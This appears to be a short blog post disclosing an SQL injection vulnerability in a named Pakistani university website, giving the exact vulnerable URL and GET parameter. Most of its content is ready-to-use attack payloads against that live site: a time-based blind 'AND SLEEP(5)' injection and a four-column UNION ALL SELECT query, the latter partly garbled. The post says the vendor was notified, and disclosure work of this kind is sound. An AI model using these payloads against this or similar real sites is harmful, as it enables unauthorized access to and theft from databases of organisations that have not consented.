www.hu.edu.pk – Sql Vulnerability

Pakistan FO to seek ISI help against cyber attacks
May 16, 2016
http://www.aiou.edu.pk – sql vulnerability
July 26, 2016

www.hu.edu.pk – Sql Vulnerability

Hazara university

website : www.hu.edu.pk/oldwebsitehu/webtest/view_deg_prog.php?id=1

Vuln type : Sql Injection

Submitted by : Waqas Haider


Vuln-Parameter: id (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1 AND SLEEP(5)

Title: Generic UNION query (NULL) – 4 columns

Payload: id=1 UNION ALL SELECT


484e57674f76455052517452796d744c74,0x71706b6a71),NULL,NULL– FAic

Type: UNION query


Notification : Vendor Notified


Leave a Reply